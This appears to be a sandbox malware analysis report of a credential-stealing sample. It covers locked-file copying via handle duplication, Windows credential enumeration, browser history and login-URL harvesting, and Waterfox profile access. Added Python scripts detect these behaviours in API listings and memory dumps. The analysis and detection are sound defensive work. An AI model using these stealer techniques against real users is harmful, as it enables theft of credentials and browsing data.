                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                    • String ID: bhv
                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
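The API sequence in the function block above (subcall 0040DD85 plus the calls at 0040E093-0040E14D) is the standard way to read a file that another process holds open with an exclusive lock, as browsers do with their credential and history databases: NtQuerySystemInformation with information class 0x10 (SystemHandleInformation) enumerates every handle on the system, OpenProcess is called with desired access 0x40 (PROCESS_DUP_HANDLE) on the owning process, DuplicateHandle pulls the file handle into the current process, and the contents are copied out through CreateFileMappingW/MapViewOfFile/WriteFile into a temporary file obtained from GetTempPathW/GetTempFileNameW (the "bhv" string in this block is consistent with the temp-file prefix). The script below is an added triage example, not part of the Joe Sandbox report: it parses lines in the report's own "APIs" format and flags this pattern, returning the addresses that carry the evidence. The sample text is constructed from the report's lines for this function; the function names and the regular expression are this example's own.

```python
"""Triage helper: parse a Joe Sandbox 'APIs' listing and flag the
locked-file copy technique (handle enumeration + handle duplication + file mapping).

Added example, not part of the Joe Sandbox report. SAMPLE is constructed from
the report's own API lines for the function at 0040E093-0040E14D and its subcalls.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Report line shape: optional "Part of subcall function X:" prefix, then
# Name.MODULE(args), ref: ADDR. Some MSVCRT lines carry no argument list.
_CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z0-9_?@]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# Windows constants (documented values, not taken from the report).
SYSTEM_HANDLE_INFORMATION = 0x10   # NtQuerySystemInformation class: all handles
PROCESS_DUP_HANDLE = 0x0040        # OpenProcess access right needed by DuplicateHandle


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall: Optional[str]


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the report's bullet lines into ApiCall records; skip anything else."""
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


def _arg_int(call: ApiCall, i: int) -> Optional[int]:
    """Argument i as an integer, or None when it is '?' or a string literal."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None


def flag_locked_file_copy(calls: List[ApiCall]) -> List[int]:
    """Return the sorted refs that evidence the technique, or [] if incomplete.

    Evidence required: handle enumeration via SystemHandleInformation, an
    OpenProcess with PROCESS_DUP_HANDLE, and the duplicate-then-copy chain.
    """
    by_name = {}
    for c in calls:
        by_name.setdefault(c.name, []).append(c)
    handle_enum = [c for c in by_name.get("NtQuerySystemInformation", [])
                   if _arg_int(c, 0) == SYSTEM_HANDLE_INFORMATION]
    dup_access = [c for c in by_name.get("OpenProcess", [])
                  if (_arg_int(c, 0) or 0) & PROCESS_DUP_HANDLE]
    required = ("DuplicateHandle", "CreateFileMappingW", "MapViewOfFile", "WriteFile")
    if not handle_enum or not dup_access or any(n not in by_name for n in required):
        return []
    evidence = handle_enum + dup_access + [by_name[n][0] for n in required]
    return sorted(c.ref for c in evidence)


# Constructed from the report's API lines for this function block.
SAMPLE = """\
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
"""

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    print(f"parsed {len(parsed)} calls")
    print("locked-file copy evidence at:", [f"{r:08X}" for r in flag_locked_file_copy(parsed)])
```

The check deliberately keys on the first argument of NtQuerySystemInformation and OpenProcess rather than on the function names alone: DuplicateHandle and file mappings are common in benign code, whereas enumerating every handle on the system and opening another process with PROCESS_DUP_HANDLE is what distinguishes a locked-file grab from ordinary file I/O. Arguments the sandbox could not resolve appear as "?" in the report and are treated as unknown, not as a match.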

                                                                                                    Control-flow Graph

                                                                                                    • Control-flow graph image omitted. Basic blocks 413f4f-413fa5; internal call 40a804; imports GetProcAddress (x5).
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                    • API String ID: 2941347001-70141382
                                                                                                    • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                    • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Control-flow Graph (graph not rendered in this export)
APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• API String ID: 2470578098-1702587658
• Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph (text rendering; block id: address range, calls, successors)
• 722: 40e175-40e1a1 call 40695d call 406b90 -> 727, 728
• 727: 40e1a7-40e1e5 memset -> 730
• 728: 40e299-40e2a8 call 4069a3
• 730: 40e1e8-40e1fa call 406e8f -> 734, 735
• 734: 40e270-40e27d call 406b53 -> 730, 741
• 735: 40e1fc-40e219 call 40dd50 * 2 -> 734, 746
• 741: 40e283-40e286 -> 742, 743
• 742: 40e291-40e294 call 40aa04 -> 728
• 743: 40e288-40e290 free -> 742
• 746: 40e21b-40e21d -> 734, 747
• 747: 40e21f-40e235 call 40742e -> 734, 750
• 750: 40e237-40e242 call 40aae3 -> 734, 753
• 753: 40e244-40e26b _snwprintf call 40a8d0 -> 734
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 1819b8f3d47d6cdb348ff1420b20e26a6f59b115d18303308c7c076ac85f3e5c
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 1819b8f3d47d6cdb348ff1420b20e26a6f59b115d18303308c7c076ac85f3e5c
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph (graph not rendered in this export)
APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph (graph not rendered in this export)
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 2936932814-4196376884
• Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

Control-flow Graph (text rendering; block id: address range, calls, successors)
• 845: 40a804-40a839 memset -> 846, 847
• 846: 40a83b-40a847 GetSystemDirectoryW -> 847
• 847: 40a84c-40a87f wcscpy call 409719 wcscat LoadLibraryW -> 850, 851
• 850: 40a881-40a884 LoadLibraryW -> 851
• 851: 40a886-40a888
APIs
• memset.MSVCRT ref: 0040A824
• GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
• wcscpy.MSVCRT ref: 0040A854
• wcscat.MSVCRT ref: 0040A86A
• LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• LoadLibraryW.KERNEL32(?), ref: 0040A884
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: C:\Windows\system32
• API String ID: 669240632-2896066436
• Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
• Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
• Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
• Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA

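Added triage example (not Joe Sandbox output and not code from the sample): the function blocks above document four string families an analyst can pivot on when a memory dump is in hand: the psapi export names resolved through GetProcAddress after the loader builds a C:\Windows\system32 path with GetSystemDirectoryW, the "visited:" filter passed to FindFirstUrlCacheEntryW (the WinINet history walk), the three login-page URLs next to _wcslwr/wcslen, and the Container_%I64d / Containers / ContainerId strings beside _snwprintf. The script below scans a dump for exactly those strings, in both ANSI and UTF-16LE because GetProcAddress names are ANSI while the *W APIs take wide strings, and reports which capabilities they imply. The dump bytes are constructed for the demonstration; the prefix-match semantics in is_login_target is my interpretation of the _wcslwr/wcslen pair and is an assumption, not something the report states.

```python
"""Offline indicator scan for the harvesting strings listed in this report.
Added example; the indicator strings come from the report, the dump is
constructed and is not memory from the analysed sample."""
import re
from typing import Dict, List

# Indicator families copied from the report's String IDs and API arguments.
INDICATORS: Dict[str, List[str]] = {
    "psapi_process_enum": [
        "psapi.dll", "EnumProcesses", "EnumProcessModules",
        "GetModuleFileNameExW", "GetModuleInformation", "GetModuleBaseNameW",
    ],
    "wininet_history_walk": ["visited:"],
    "login_url_targets": [
        "http://www.facebook.com/",
        "https://login.yahoo.com/config/login",
        "https://www.google.com/accounts/servicelogin",
    ],
    "webcache_containers": ["Containers", "ContainerId", "Container_%I64d"],
}

LOGIN_URLS = tuple(INDICATORS["login_url_targets"])


def _encodings(s: str) -> List[bytes]:
    # ANSI for GetProcAddress names, UTF-16LE for *W API string arguments.
    return [s.encode("ascii"), s.encode("utf-16-le")]


def find_indicators(dump: bytes) -> Dict[str, List[str]]:
    """Return, per family, the indicator strings present in the dump."""
    hits: Dict[str, List[str]] = {}
    for family, strings in INDICATORS.items():
        found = [s for s in strings if any(e in dump for e in _encodings(s))]
        if found:
            hits[family] = found
    return hits


def assess(dump: bytes) -> List[str]:
    """Turn string hits into capability labels.  Process enumeration needs
    both EnumProcesses and EnumProcessModules; history harvesting needs the
    'visited:' filter together with at least one login URL."""
    hits = find_indicators(dump)
    caps: List[str] = []
    psapi = set(hits.get("psapi_process_enum", []))
    if {"EnumProcesses", "EnumProcessModules"} <= psapi:
        caps.append("process_enumeration")
    if "wininet_history_walk" in hits and "login_url_targets" in hits:
        caps.append("browser_history_login_harvest")
    if "webcache_containers" in hits:
        caps.append("webcache_container_parse")
    return caps


def is_login_target(url: str) -> bool:
    """Lowercase-then-prefix compare against the three login URLs.
    Assumption: this mirrors the _wcslwr + wcslen sequence in the report;
    the sample's exact compare is not documented on the page."""
    u = url.lower()
    return any(u.startswith(t) for t in LOGIN_URLS)


def extract_wide_strings(dump: bytes, min_len: int = 6) -> List[str]:
    """Pull printable UTF-16LE runs, the form the *W string arguments take."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pat.finditer(dump)]


# Constructed dump: filler with a subset of the indicators planted in it.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"psapi.dll\x00EnumProcesses\x00EnumProcessModules\x00"
    + b"GetModuleFileNameExW\x00GetModuleInformation\x00"
    + b"\xcc" * 32
    + "visited:".encode("utf-16-le") + b"\x00\x00"
    + "https://login.yahoo.com/config/login".encode("utf-16-le") + b"\x00\x00"
    + "Container_%I64d".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 16
)

if __name__ == "__main__":
    print(find_indicators(SAMPLE_DUMP))
    print(assess(SAMPLE_DUMP))
    print(extract_wide_strings(SAMPLE_DUMP))
    print(is_login_target("HTTPS://Login.Yahoo.com/config/login?.src=ym"))
```

To run it against a real dump, read the .sdmp file as bytes and pass it to assess(); a hit on all three capability labels is the string-level counterpart of the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures at the top of this report, while a single family on its own (psapi names in particular) is common in benign software and should not be treated as a verdict.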
                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 852 40bdb0-40bdce call 404363 855 40bf63-40bf6f call 40440c 852->855 856 40bdd4-40bddd 852->856 858 40bdee 856->858 859 40bddf-40bdec CredEnumerateW 856->859 861 40bdf0-40bdf2 858->861 859->861 861->855 862 40bdf8-40be18 call 40b2cc wcslen 861->862 865 40bf5d 862->865 866 40be1e-40be20 862->866 865->855 866->865 867 40be26-40be42 wcsncmp 866->867 868 40be48-40be77 call 40bd5d call 404423 867->868 869 40bf4e-40bf57 867->869 868->869 874 40be7d-40bea3 memset 868->874 869->865 869->866 875 40bea5 874->875 876 40bea7-40beea memcpy 874->876 875->876 877 40bf11-40bf2d wcschr 876->877 878 40beec-40bf06 call 40b2cc _wcsnicmp 876->878 880 40bf38-40bf48 LocalFree 877->880 881 40bf2f-40bf35 877->881 878->877 884 40bf08-40bf0e 878->884 880->869 881->880 884->877
APIs
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
• wcsncmp.MSVCRT ref: 0040BE38
• memset.MSVCRT ref: 0040BE91
• memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
• _wcsnicmp.MSVCRT ref: 0040BEFC
• wcschr.MSVCRT ref: 0040BF24
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
• String ID:
• API String ID: 697348961-0
APIs
• memset.MSVCRT ref: 00403CBF
• memset.MSVCRT ref: 00403CD4
• memset.MSVCRT ref: 00403CE9
• memset.MSVCRT ref: 00403CFE
• memset.MSVCRT ref: 00403D13
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403DDA
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Similarity
• API ID: memset$wcscpy$wcslen$FolderPathSpecial_snwprintfmemcpywcscat
• String ID: Waterfox$Waterfox\Profiles
• API String ID: 3327325665-11920434
APIs
• memset.MSVCRT ref: 00403E50
• memset.MSVCRT ref: 00403E65
• memset.MSVCRT ref: 00403E7A
• memset.MSVCRT ref: 00403E8F
• memset.MSVCRT ref: 00403EA4
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 00403F6B
